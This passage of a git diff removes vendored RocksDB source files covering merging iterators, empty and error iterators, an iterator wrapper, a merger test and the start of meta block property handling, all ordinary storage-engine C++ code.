-
-namespace {
-class EmptyIterator : public Iterator {
- public:
-  explicit EmptyIterator(const Status& s) : status_(s) { }
-  virtual bool Valid() const override { return false; }
-  virtual void Seek(const Slice& target) override {}
-  virtual void SeekForPrev(const Slice& target) override {}
-  virtual void SeekToFirst() override {}
-  virtual void SeekToLast() override {}
-  virtual void Next() override { assert(false); }
-  virtual void Prev() override { assert(false); }
-  Slice key() const override {
-    assert(false);
-    return Slice();
-  }
-  Slice value() const override {
-    assert(false);
-    return Slice();
-  }
-  virtual Status status() const override { return status_; }
-
- private:
-  Status status_;
-};
-
-class EmptyInternalIterator : public InternalIterator {
- public:
-  explicit EmptyInternalIterator(const Status& s) : status_(s) {}
-  virtual bool Valid() const override { return false; }
-  virtual void Seek(const Slice& target) override {}
-  virtual void SeekForPrev(const Slice& target) override {}
-  virtual void SeekToFirst() override {}
-  virtual void SeekToLast() override {}
-  virtual void Next() override { assert(false); }
-  virtual void Prev() override { assert(false); }
-  Slice key() const override {
-    assert(false);
-    return Slice();
-  }
-  Slice value() const override {
-    assert(false);
-    return Slice();
-  }
-  virtual Status status() const override { return status_; }
-
- private:
-  Status status_;
-};
-}  // namespace
-
-Iterator* NewEmptyIterator() {
-  return new EmptyIterator(Status::OK());
-}
-
-Iterator* NewErrorIterator(const Status& status) {
-  return new EmptyIterator(status);
-}
-
-InternalIterator* NewEmptyInternalIterator() {
-  return new EmptyInternalIterator(Status::OK());
-}
-
-InternalIterator* NewEmptyInternalIterator(Arena* arena) {
-  if (arena == nullptr) {
-    return NewEmptyInternalIterator();
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(EmptyIterator));
-    return new (mem) EmptyInternalIterator(Status::OK());
-  }
-}
-
-InternalIterator* NewErrorInternalIterator(const Status& status) {
-  return new EmptyInternalIterator(status);
-}
-
-InternalIterator* NewErrorInternalIterator(const Status& status, Arena* arena) {
-  if (arena == nullptr) {
-    return NewErrorInternalIterator(status);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(EmptyIterator));
-    return new (mem) EmptyInternalIterator(status);
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/iterator_wrapper.h b/thirdparty/rocksdb/table/iterator_wrapper.h
deleted file mode 100644
index f14acdb..0000000
--- a/thirdparty/rocksdb/table/iterator_wrapper.h
+++ /dev/null
@@ -1,106 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <set>
-
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-// A internal wrapper class with an interface similar to Iterator that caches
-// the valid() and key() results for an underlying iterator.
-// This can help avoid virtual function calls and also gives better
-// cache locality.
-class IteratorWrapper {
- public:
-  IteratorWrapper() : iter_(nullptr), valid_(false) {}
-  explicit IteratorWrapper(InternalIterator* _iter) : iter_(nullptr) {
-    Set(_iter);
-  }
-  ~IteratorWrapper() {}
-  InternalIterator* iter() const { return iter_; }
-
-  // Set the underlying Iterator to _iter and return
-  // previous underlying Iterator.
-  InternalIterator* Set(InternalIterator* _iter) {
-    InternalIterator* old_iter = iter_;
-
-    iter_ = _iter;
-    if (iter_ == nullptr) {
-      valid_ = false;
-    } else {
-      Update();
-    }
-    return old_iter;
-  }
-
-  void DeleteIter(bool is_arena_mode) {
-    if (iter_) {
-      if (!is_arena_mode) {
-        delete iter_;
-      } else {
-        iter_->~InternalIterator();
-      }
-    }
-  }
-
-  // Iterator interface methods
-  bool Valid() const        { return valid_; }
-  Slice key() const         { assert(Valid()); return key_; }
-  Slice value() const       { assert(Valid()); return iter_->value(); }
-  // Methods below require iter() != nullptr
-  Status status() const     { assert(iter_); return iter_->status(); }
-  void Next()               { assert(iter_); iter_->Next();        Update(); }
-  void Prev()               { assert(iter_); iter_->Prev();        Update(); }
-  void Seek(const Slice& k) { assert(iter_); iter_->Seek(k);       Update(); }
-  void SeekForPrev(const Slice& k) {
-    assert(iter_);
-    iter_->SeekForPrev(k);
-    Update();
-  }
-  void SeekToFirst()        { assert(iter_); iter_->SeekToFirst(); Update(); }
-  void SeekToLast()         { assert(iter_); iter_->SeekToLast();  Update(); }
-
-  void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) {
-    assert(iter_);
-    iter_->SetPinnedItersMgr(pinned_iters_mgr);
-  }
-  bool IsKeyPinned() const {
-    assert(Valid());
-    return iter_->IsKeyPinned();
-  }
-  bool IsValuePinned() const {
-    assert(Valid());
-    return iter_->IsValuePinned();
-  }
-
- private:
-  void Update() {
-    valid_ = iter_->Valid();
-    if (valid_) {
-      key_ = iter_->key();
-    }
-  }
-
-  InternalIterator* iter_;
-  bool valid_;
-  Slice key_;
-};
-
-class Arena;
-// Return an empty iterator (yields nothing) allocated from arena.
-extern InternalIterator* NewEmptyInternalIterator(Arena* arena);
-
-// Return an empty iterator with the specified status, allocated arena.
-extern InternalIterator* NewErrorInternalIterator(const Status& status,
-                                                  Arena* arena);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/merger_test.cc b/thirdparty/rocksdb/table/merger_test.cc
deleted file mode 100644
index 379a6f4..0000000
--- a/thirdparty/rocksdb/table/merger_test.cc
+++ /dev/null
@@ -1,169 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <vector>
-#include <string>
-
-#include "table/merging_iterator.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class MergerTest : public testing::Test {
- public:
-  MergerTest()
-      : rnd_(3), merging_iterator_(nullptr), single_iterator_(nullptr) {}
-  ~MergerTest() = default;
-  std::vector<std::string> GenerateStrings(size_t len, int string_len) {
-    std::vector<std::string> ret;
-    for (size_t i = 0; i < len; ++i) {
-      ret.push_back(test::RandomHumanReadableString(&rnd_, string_len));
-    }
-    return ret;
-  }
-
-  void AssertEquivalence() {
-    auto a = merging_iterator_.get();
-    auto b = single_iterator_.get();
-    if (!a->Valid()) {
-      ASSERT_TRUE(!b->Valid());
-    } else {
-      ASSERT_TRUE(b->Valid());
-      ASSERT_EQ(b->key().ToString(), a->key().ToString());
-      ASSERT_EQ(b->value().ToString(), a->value().ToString());
-    }
-  }
-
-  void SeekToRandom() { Seek(test::RandomHumanReadableString(&rnd_, 5)); }
-
-  void Seek(std::string target) {
-    merging_iterator_->Seek(target);
-    single_iterator_->Seek(target);
-  }
-
-  void SeekToFirst() {
-    merging_iterator_->SeekToFirst();
-    single_iterator_->SeekToFirst();
-  }
-
-  void SeekToLast() {
-    merging_iterator_->SeekToLast();
-    single_iterator_->SeekToLast();
-  }
-
-  void Next(int times) {
-    for (int i = 0; i < times && merging_iterator_->Valid(); ++i) {
-      AssertEquivalence();
-      merging_iterator_->Next();
-      single_iterator_->Next();
-    }
-    AssertEquivalence();
-  }
-
-  void Prev(int times) {
-    for (int i = 0; i < times && merging_iterator_->Valid(); ++i) {
-      AssertEquivalence();
-      merging_iterator_->Prev();
-      single_iterator_->Prev();
-    }
-    AssertEquivalence();
-  }
-
-  void NextAndPrev(int times) {
-    for (int i = 0; i < times && merging_iterator_->Valid(); ++i) {
-      AssertEquivalence();
-      if (rnd_.OneIn(2)) {
-        merging_iterator_->Prev();
-        single_iterator_->Prev();
-      } else {
-        merging_iterator_->Next();
-        single_iterator_->Next();
-      }
-    }
-    AssertEquivalence();
-  }
-
-  void Generate(size_t num_iterators, size_t strings_per_iterator,
-                int letters_per_string) {
-    std::vector<InternalIterator*> small_iterators;
-    for (size_t i = 0; i < num_iterators; ++i) {
-      auto strings = GenerateStrings(strings_per_iterator, letters_per_string);
-      small_iterators.push_back(new test::VectorIterator(strings));
-      all_keys_.insert(all_keys_.end(), strings.begin(), strings.end());
-    }
-
-    merging_iterator_.reset(
-        NewMergingIterator(BytewiseComparator(), &small_iterators[0],
-                           static_cast<int>(small_iterators.size())));
-    single_iterator_.reset(new test::VectorIterator(all_keys_));
-  }
-
-  Random rnd_;
-  std::unique_ptr<InternalIterator> merging_iterator_;
-  std::unique_ptr<InternalIterator> single_iterator_;
-  std::vector<std::string> all_keys_;
-};
-
-TEST_F(MergerTest, SeekToRandomNextTest) {
-  Generate(1000, 50, 50);
-  for (int i = 0; i < 10; ++i) {
-    SeekToRandom();
-    AssertEquivalence();
-    Next(50000);
-  }
-}
-
-TEST_F(MergerTest, SeekToRandomNextSmallStringsTest) {
-  Generate(1000, 50, 2);
-  for (int i = 0; i < 10; ++i) {
-    SeekToRandom();
-    AssertEquivalence();
-    Next(50000);
-  }
-}
-
-TEST_F(MergerTest, SeekToRandomPrevTest) {
-  Generate(1000, 50, 50);
-  for (int i = 0; i < 10; ++i) {
-    SeekToRandom();
-    AssertEquivalence();
-    Prev(50000);
-  }
-}
-
-TEST_F(MergerTest, SeekToRandomRandomTest) {
-  Generate(200, 50, 50);
-  for (int i = 0; i < 3; ++i) {
-    SeekToRandom();
-    AssertEquivalence();
-    NextAndPrev(5000);
-  }
-}
-
-TEST_F(MergerTest, SeekToFirstTest) {
-  Generate(1000, 50, 50);
-  for (int i = 0; i < 10; ++i) {
-    SeekToFirst();
-    AssertEquivalence();
-    Next(50000);
-  }
-}
-
-TEST_F(MergerTest, SeekToLastTest) {
-  Generate(1000, 50, 50);
-  for (int i = 0; i < 10; ++i) {
-    SeekToLast();
-    AssertEquivalence();
-    Prev(50000);
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/merging_iterator.cc b/thirdparty/rocksdb/table/merging_iterator.cc
deleted file mode 100644
index da30e1e..0000000
--- a/thirdparty/rocksdb/table/merging_iterator.cc
+++ /dev/null
@@ -1,404 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/merging_iterator.h"
-#include <string>
-#include <vector>
-#include "db/pinned_iterators_manager.h"
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "table/internal_iterator.h"
-#include "table/iter_heap.h"
-#include "table/iterator_wrapper.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-#include "util/heap.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-// Without anonymous namespace here, we fail the warning -Wmissing-prototypes
-namespace {
-typedef BinaryHeap<IteratorWrapper*, MaxIteratorComparator> MergerMaxIterHeap;
-typedef BinaryHeap<IteratorWrapper*, MinIteratorComparator> MergerMinIterHeap;
-}  // namespace
-
-const size_t kNumIterReserve = 4;
-
-class MergingIterator : public InternalIterator {
- public:
-  MergingIterator(const Comparator* comparator, InternalIterator** children,
-                  int n, bool is_arena_mode, bool prefix_seek_mode)
-      : is_arena_mode_(is_arena_mode),
-        comparator_(comparator),
-        current_(nullptr),
-        direction_(kForward),
-        minHeap_(comparator_),
-        prefix_seek_mode_(prefix_seek_mode),
-        pinned_iters_mgr_(nullptr) {
-    children_.resize(n);
-    for (int i = 0; i < n; i++) {
-      children_[i].Set(children[i]);
-    }
-    for (auto& child : children_) {
-      if (child.Valid()) {
-        minHeap_.push(&child);
-      }
-    }
-    current_ = CurrentForward();
-  }
-
-  virtual void AddIterator(InternalIterator* iter) {
-    assert(direction_ == kForward);
-    children_.emplace_back(iter);
-    if (pinned_iters_mgr_) {
-      iter->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-    auto new_wrapper = children_.back();
-    if (new_wrapper.Valid()) {
-      minHeap_.push(&new_wrapper);
-      current_ = CurrentForward();
-    }
-  }
-
-  virtual ~MergingIterator() {
-    for (auto& child : children_) {
-      child.DeleteIter(is_arena_mode_);
-    }
-  }
-
-  virtual bool Valid() const override { return (current_ != nullptr); }
-
-  virtual void SeekToFirst() override {
-    ClearHeaps();
-    for (auto& child : children_) {
-      child.SeekToFirst();
-      if (child.Valid()) {
-        minHeap_.push(&child);
-      }
-    }
-    direction_ = kForward;
-    current_ = CurrentForward();
-  }
-
-  virtual void SeekToLast() override {
-    ClearHeaps();
-    InitMaxHeap();
-    for (auto& child : children_) {
-      child.SeekToLast();
-      if (child.Valid()) {
-        maxHeap_->push(&child);
-      }
-    }
-    direction_ = kReverse;
-    current_ = CurrentReverse();
-  }
-
-  virtual void Seek(const Slice& target) override {
-    ClearHeaps();
-    for (auto& child : children_) {
-      {
-        PERF_TIMER_GUARD(seek_child_seek_time);
-        child.Seek(target);
-      }
-      PERF_COUNTER_ADD(seek_child_seek_count, 1);
-
-      if (child.Valid()) {
-        PERF_TIMER_GUARD(seek_min_heap_time);
-        minHeap_.push(&child);
-      }
-    }
-    direction_ = kForward;
-    {
-      PERF_TIMER_GUARD(seek_min_heap_time);
-      current_ = CurrentForward();
-    }
-  }
-
-  virtual void SeekForPrev(const Slice& target) override {
-    ClearHeaps();
-    InitMaxHeap();
-
-    for (auto& child : children_) {
-      {
-        PERF_TIMER_GUARD(seek_child_seek_time);
-        child.SeekForPrev(target);
-      }
-      PERF_COUNTER_ADD(seek_child_seek_count, 1);
-
-      if (child.Valid()) {
-        PERF_TIMER_GUARD(seek_max_heap_time);
-        maxHeap_->push(&child);
-      }
-    }
-    direction_ = kReverse;
-    {
-      PERF_TIMER_GUARD(seek_max_heap_time);
-      current_ = CurrentReverse();
-    }
-  }
-
-  virtual void Next() override {
-    assert(Valid());
-
-    // Ensure that all children are positioned after key().
-    // If we are moving in the forward direction, it is already
-    // true for all of the non-current children since current_ is
-    // the smallest child and key() == current_->key().
-    if (direction_ != kForward) {
-      // Otherwise, advance the non-current children.  We advance current_
-      // just after the if-block.
-      ClearHeaps();
-      for (auto& child : children_) {
-        if (&child != current_) {
-          child.Seek(key());
-          if (child.Valid() && comparator_->Equal(key(), child.key())) {
-            child.Next();
-          }
-        }
-        if (child.Valid()) {
-          minHeap_.push(&child);
-        }
-      }
-      direction_ = kForward;
-      // The loop advanced all non-current children to be > key() so current_
-      // should still be strictly the smallest key.
-      assert(current_ == CurrentForward());
-    }
-
-    // For the heap modifications below to be correct, current_ must be the
-    // current top of the heap.
-    assert(current_ == CurrentForward());
-
-    // as the current points to the current record. move the iterator forward.
-    current_->Next();
-    if (current_->Valid()) {
-      // current is still valid after the Next() call above.  Call
-      // replace_top() to restore the heap property.  When the same child
-      // iterator yields a sequence of keys, this is cheap.
-      minHeap_.replace_top(current_);
-    } else {
-      // current stopped being valid, remove it from the heap.
-      minHeap_.pop();
-    }
-    current_ = CurrentForward();
-  }
-
-  virtual void Prev() override {
-    assert(Valid());
-    // Ensure that all children are positioned before key().
-    // If we are moving in the reverse direction, it is already
-    // true for all of the non-current children since current_ is
-    // the largest child and key() == current_->key().
-    if (direction_ != kReverse) {
-      // Otherwise, retreat the non-current children.  We retreat current_
-      // just after the if-block.
-      ClearHeaps();
-      InitMaxHeap();
-      for (auto& child : children_) {
-        if (&child != current_) {
-          if (!prefix_seek_mode_) {
-            child.Seek(key());
-            if (child.Valid()) {
-              // Child is at first entry >= key().  Step back one to be < key()
-              TEST_SYNC_POINT_CALLBACK("MergeIterator::Prev:BeforePrev",
-                                       &child);
-              child.Prev();
-            } else {
-              // Child has no entries >= key().  Position at last entry.
-              TEST_SYNC_POINT("MergeIterator::Prev:BeforeSeekToLast");
-              child.SeekToLast();
-            }
-          } else {
-            child.SeekForPrev(key());
-            if (child.Valid() && comparator_->Equal(key(), child.key())) {
-              child.Prev();
-            }
-          }
-        }
-        if (child.Valid()) {
-          maxHeap_->push(&child);
-        }
-      }
-      direction_ = kReverse;
-      if (!prefix_seek_mode_) {
-        // Note that we don't do assert(current_ == CurrentReverse()) here
-        // because it is possible to have some keys larger than the seek-key
-        // inserted between Seek() and SeekToLast(), which makes current_ not
-        // equal to CurrentReverse().
-        current_ = CurrentReverse();
-      }
-      // The loop advanced all non-current children to be < key() so current_
-      // should still be strictly the smallest key.
-      assert(current_ == CurrentReverse());
-    }
-
-    // For the heap modifications below to be correct, current_ must be the
-    // current top of the heap.
-    assert(current_ == CurrentReverse());
-
-    current_->Prev();
-    if (current_->Valid()) {
-      // current is still valid after the Prev() call above.  Call
-      // replace_top() to restore the heap property.  When the same child
-      // iterator yields a sequence of keys, this is cheap.
-      maxHeap_->replace_top(current_);
-    } else {
-      // current stopped being valid, remove it from the heap.
-      maxHeap_->pop();
-    }
-    current_ = CurrentReverse();
-  }
-
-  virtual Slice key() const override {
-    assert(Valid());
-    return current_->key();
-  }
-
-  virtual Slice value() const override {
-    assert(Valid());
-    return current_->value();
-  }
-
-  virtual Status status() const override {
-    Status s;
-    for (auto& child : children_) {
-      s = child.status();
-      if (!s.ok()) {
-        break;
-      }
-    }
-    return s;
-  }
-
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-    for (auto& child : children_) {
-      child.SetPinnedItersMgr(pinned_iters_mgr);
-    }
-  }
-
-  virtual bool IsKeyPinned() const override {
-    assert(Valid());
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           current_->IsKeyPinned();
-  }
-
-  virtual bool IsValuePinned() const override {
-    assert(Valid());
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           current_->IsValuePinned();
-  }
-
- private:
-  // Clears heaps for both directions, used when changing direction or seeking
-  void ClearHeaps();
-  // Ensures that maxHeap_ is initialized when starting to go in the reverse
-  // direction
-  void InitMaxHeap();
-
-  bool is_arena_mode_;
-  const Comparator* comparator_;
-  autovector<IteratorWrapper, kNumIterReserve> children_;
-
-  // Cached pointer to child iterator with the current key, or nullptr if no
-  // child iterators are valid.  This is the top of minHeap_ or maxHeap_
-  // depending on the direction.
-  IteratorWrapper* current_;
-  // Which direction is the iterator moving?
-  enum Direction {
-    kForward,
-    kReverse
-  };
-  Direction direction_;
-  MergerMinIterHeap minHeap_;
-  bool prefix_seek_mode_;
-
-  // Max heap is used for reverse iteration, which is way less common than
-  // forward.  Lazily initialize it to save memory.
-  std::unique_ptr<MergerMaxIterHeap> maxHeap_;
-  PinnedIteratorsManager* pinned_iters_mgr_;
-
-  IteratorWrapper* CurrentForward() const {
-    assert(direction_ == kForward);
-    return !minHeap_.empty() ? minHeap_.top() : nullptr;
-  }
-
-  IteratorWrapper* CurrentReverse() const {
-    assert(direction_ == kReverse);
-    assert(maxHeap_);
-    return !maxHeap_->empty() ? maxHeap_->top() : nullptr;
-  }
-};
-
-void MergingIterator::ClearHeaps() {
-  minHeap_.clear();
-  if (maxHeap_) {
-    maxHeap_->clear();
-  }
-}
-
-void MergingIterator::InitMaxHeap() {
-  if (!maxHeap_) {
-    maxHeap_.reset(new MergerMaxIterHeap(comparator_));
-  }
-}
-
-InternalIterator* NewMergingIterator(const Comparator* cmp,
-                                     InternalIterator** list, int n,
-                                     Arena* arena, bool prefix_seek_mode) {
-  assert(n >= 0);
-  if (n == 0) {
-    return NewEmptyInternalIterator(arena);
-  } else if (n == 1) {
-    return list[0];
-  } else {
-    if (arena == nullptr) {
-      return new MergingIterator(cmp, list, n, false, prefix_seek_mode);
-    } else {
-      auto mem = arena->AllocateAligned(sizeof(MergingIterator));
-      return new (mem) MergingIterator(cmp, list, n, true, prefix_seek_mode);
-    }
-  }
-}
-
-MergeIteratorBuilder::MergeIteratorBuilder(const Comparator* comparator,
-                                           Arena* a, bool prefix_seek_mode)
-    : first_iter(nullptr), use_merging_iter(false), arena(a) {
-  auto mem = arena->AllocateAligned(sizeof(MergingIterator));
-  merge_iter =
-      new (mem) MergingIterator(comparator, nullptr, 0, true, prefix_seek_mode);
-}
-
-void MergeIteratorBuilder::AddIterator(InternalIterator* iter) {
-  if (!use_merging_iter && first_iter != nullptr) {
-    merge_iter->AddIterator(first_iter);
-    use_merging_iter = true;
-  }
-  if (use_merging_iter) {
-    merge_iter->AddIterator(iter);
-  } else {
-    first_iter = iter;
-  }
-}
-
-InternalIterator* MergeIteratorBuilder::Finish() {
-  if (!use_merging_iter) {
-    return first_iter;
-  } else {
-    auto ret = merge_iter;
-    merge_iter = nullptr;
-    return ret;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/merging_iterator.h b/thirdparty/rocksdb/table/merging_iterator.h
deleted file mode 100644
index 48a28d8..0000000
--- a/thirdparty/rocksdb/table/merging_iterator.h
+++ /dev/null
@@ -1,62 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-class Comparator;
-class InternalIterator;
-class Env;
-class Arena;
-
-// Return an iterator that provided the union of the data in
-// children[0,n-1].  Takes ownership of the child iterators and
-// will delete them when the result iterator is deleted.
-//
-// The result does no duplicate suppression.  I.e., if a particular
-// key is present in K child iterators, it will be yielded K times.
-//
-// REQUIRES: n >= 0
-extern InternalIterator* NewMergingIterator(const Comparator* comparator,
-                                            InternalIterator** children, int n,
-                                            Arena* arena = nullptr,
-                                            bool prefix_seek_mode = false);
-
-class MergingIterator;
-
-// A builder class to build a merging iterator by adding iterators one by one.
-class MergeIteratorBuilder {
- public:
-  // comparator: the comparator used in merging comparator
-  // arena: where the merging iterator needs to be allocated from.
-  explicit MergeIteratorBuilder(const Comparator* comparator, Arena* arena,
-                                bool prefix_seek_mode = false);
-  ~MergeIteratorBuilder() {}
-
-  // Add iter to the merging iterator.
-  void AddIterator(InternalIterator* iter);
-
-  // Get arena used to build the merging iterator. It is called one a child
-  // iterator needs to be allocated.
-  Arena* GetArena() { return arena; }
-
-  // Return the result merging iterator.
-  InternalIterator* Finish();
-
- private:
-  MergingIterator* merge_iter;
-  InternalIterator* first_iter;
-  bool use_merging_iter;
-  Arena* arena;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/meta_blocks.cc b/thirdparty/rocksdb/table/meta_blocks.cc
deleted file mode 100644
index 19925d7..0000000
--- a/thirdparty/rocksdb/table/meta_blocks.cc
+++ /dev/null
@@ -1,414 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include "table/meta_blocks.h"
-
-#include <map>
-#include <string>
-
-#include "db/table_properties_collector.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "table/block.h"
-#include "table/format.h"
-#include "table/internal_iterator.h"
-#include "table/persistent_cache_helper.h"
-#include "table/table_properties_internal.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-MetaIndexBuilder::MetaIndexBuilder()
-    : meta_index_block_(new BlockBuilder(1 /* restart interval */)) {}
-
-void MetaIndexBuilder::Add(const std::string& key,
-                           const BlockHandle& handle) {
-  std::string handle_encoding;
-  handle.EncodeTo(&handle_encoding);
-  meta_block_handles_.insert({key, handle_encoding});
-}
-
-Slice MetaIndexBuilder::Finish() {
-  for (const auto& metablock : meta_block_handles_) {
-    meta_index_block_->Add(metablock.first, metablock.second);
-  }
-  return meta_index_block_->Finish();
-}
-
-PropertyBlockBuilder::PropertyBlockBuilder()
-    : properties_block_(new BlockBuilder(1 /* restart interval */)) {}
-
-void PropertyBlockBuilder::Add(const std::string& name,
-                               const std::string& val) {
-  props_.insert({name, val});
-}
-
-void PropertyBlockBuilder::Add(const std::string& name, uint64_t val) {
-  assert(props_.find(name) == props_.end());
-
-  std::string dst;
-  PutVarint64(&dst, val);
-
-  Add(name, dst);
-}
-
-void PropertyBlockBuilder::Add(
-    const UserCollectedProperties& user_collected_properties) {
-  for (const auto& prop : user_collected_properties) {
-    Add(prop.first, prop.second);
-  }
-}
-
-void PropertyBlockBuilder::AddTableProperty(const TableProperties& props) {
-  Add(TablePropertiesNames::kRawKeySize, props.raw_key_size);
-  Add(TablePropertiesNames::kRawValueSize, props.raw_value_size);
-  Add(TablePropertiesNames::kDataSize, props.data_size);
-  Add(TablePropertiesNames::kIndexSize, props.index_size);
-  if (props.index_partitions != 0) {
-    Add(TablePropertiesNames::kIndexPartitions, props.index_partitions);
-    Add(TablePropertiesNames::kTopLevelIndexSize, props.top_level_index_size);
-  }
-  Add(TablePropertiesNames::kNumEntries, props.num_entries);
-  Add(TablePropertiesNames::kNumDataBlocks, props.num_data_blocks);
-  Add(TablePropertiesNames::kFilterSize, props.filter_size);
-  Add(TablePropertiesNames::kFormatVersion, props.format_version);
-  Add(TablePropertiesNames::kFixedKeyLen, props.fixed_key_len);
-  Add(TablePropertiesNames::kColumnFamilyId, props.column_family_id);
-  Add(TablePropertiesNames::kCreationTime, props.creation_time);
-  Add(TablePropertiesNames::kOldestKeyTime, props.oldest_key_time);
-
-  if (!props.filter_policy_name.empty()) {
-    Add(TablePropertiesNames::kFilterPolicy, props.filter_policy_name);
-  }
-  if (!props.comparator_name.empty()) {
-    Add(TablePropertiesNames::kComparator, props.comparator_name);
-  }
-
-  if (!props.merge_operator_name.empty()) {
-    Add(TablePropertiesNames::kMergeOperator, props.merge_operator_name);
-  }
-  if (!props.prefix_extractor_name.empty()) {
-    Add(TablePropertiesNames::kPrefixExtractorName,
-        props.prefix_extractor_name);
-  }
-  if (!props.property_collectors_names.empty()) {
-    Add(TablePropertiesNames::kPropertyCollectors,
-        props.property_collectors_names);
-  }
-  if (!props.column_family_name.empty()) {
-    Add(TablePropertiesNames::kColumnFamilyName, props.column_family_name);
-  }
-
-  if (!props.compression_name.empty()) {
-    Add(TablePropertiesNames::kCompression, props.compression_name);
-  }
-}
-
-Slice PropertyBlockBuilder::Finish() {
-  for (const auto& prop : props_) {
-    properties_block_->Add(prop.first, prop.second);
-  }
-
-  return properties_block_->Finish();
-}
-
-void LogPropertiesCollectionError(
-    Logger* info_log, const std::string& method, const std::string& name) {
-  assert(method == "Add" || method == "Finish");
-
-  std::string msg =
-    "Encountered error when calling TablePropertiesCollector::" +
-    method + "() with collector name: " + name;
-  ROCKS_LOG_ERROR(info_log, "%s", msg.c_str());
-}
-
-bool NotifyCollectTableCollectorsOnAdd(
-    const Slice& key, const Slice& value, uint64_t file_size,
-    const std::vector<std::unique_ptr<IntTblPropCollector>>& collectors,
-    Logger* info_log) {
-  bool all_succeeded = true;
-  for (auto& collector : collectors) {
-    Status s = collector->InternalAdd(key, value, file_size);
-    all_succeeded = all_succeeded && s.ok();
-    if (!s.ok()) {
-      LogPropertiesCollectionError(info_log, "Add" /* method */,
-                                   collector->Name());
-    }
-  }
-  return all_succeeded;
-}
-
-bool NotifyCollectTableCollectorsOnFinish(
-    const std::vector<std::unique_ptr<IntTblPropCollector>>& collectors,
-    Logger* info_log, PropertyBlockBuilder* builder) {
-  bool all_succeeded = true;
-  for (auto& collector : collectors) {
-    UserCollectedProperties user_collected_properties;
-    Status s = collector->Finish(&user_collected_properties);
-
-    all_succeeded = all_succeeded && s.ok();
-    if (!s.ok()) {
-      LogPropertiesCollectionError(info_log, "Finish" /* method */,
-                                   collector->Name());
-    } else {
-      builder->Add(user_collected_properties);
-    }
-  }
-
-  return all_succeeded;
-}
-
-Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file,
-                      FilePrefetchBuffer* prefetch_buffer, const Footer& footer,
-                      const ImmutableCFOptions& ioptions,
-                      TableProperties** table_properties) {
-  assert(table_properties);
-
-  Slice v = handle_value;
-  BlockHandle handle;
-  if (!handle.DecodeFrom(&v).ok()) {
-    return Status::InvalidArgument("Failed to decode properties block handle");
-  }
-
-  BlockContents block_contents;
-  ReadOptions read_options;
-  read_options.verify_checksums = false;
-  Status s;
-  s = ReadBlockContents(file, prefetch_buffer, footer, read_options, handle,
-                        &block_contents, ioptions, false /* decompress */);
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  Block properties_block(std::move(block_contents),
-                         kDisableGlobalSequenceNumber);
-  BlockIter iter;
-  properties_block.NewIterator(BytewiseComparator(), &iter);
-
-  auto new_table_properties = new TableProperties();
-  // All pre-defined properties of type uint64_t
-  std::unordered_map<std::string, uint64_t*> predefined_uint64_properties = {
-      {TablePropertiesNames::kDataSize, &new_table_properties->data_size},
-      {TablePropertiesNames::kIndexSize, &new_table_properties->index_size},
-      {TablePropertiesNames::kIndexPartitions,
-       &new_table_properties->index_partitions},
-      {TablePropertiesNames::kTopLevelIndexSize,
-       &new_table_properties->top_level_index_size},
-      {TablePropertiesNames::kFilterSize, &new_table_properties->filter_size},
-      {TablePropertiesNames::kRawKeySize, &new_table_properties->raw_key_size},
-      {TablePropertiesNames::kRawValueSize,
-       &new_table_properties->raw_value_size},
